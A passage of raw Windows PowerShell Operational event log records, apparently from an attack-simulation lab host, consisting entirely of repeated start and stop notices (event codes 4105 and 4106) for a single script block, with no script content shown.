Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470018
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470017
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470016
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470015
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470014
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470013
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470012
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470011
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470010
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470009
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470008
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470007
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470006
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470005
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470004
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470003
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470002
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470001
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470000
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469999
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469998
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469997
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469996
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469995
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469994
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469993
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469992
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469991
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469990
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469989
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469988
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469987
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469986
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469985
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469984
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469983
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469982
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469981
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469980
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469979
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469978
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469977
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469976
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469975
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469974
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469973
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469972
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469971
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469970
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469969
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469968
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469967
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469966
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469965
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469964
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
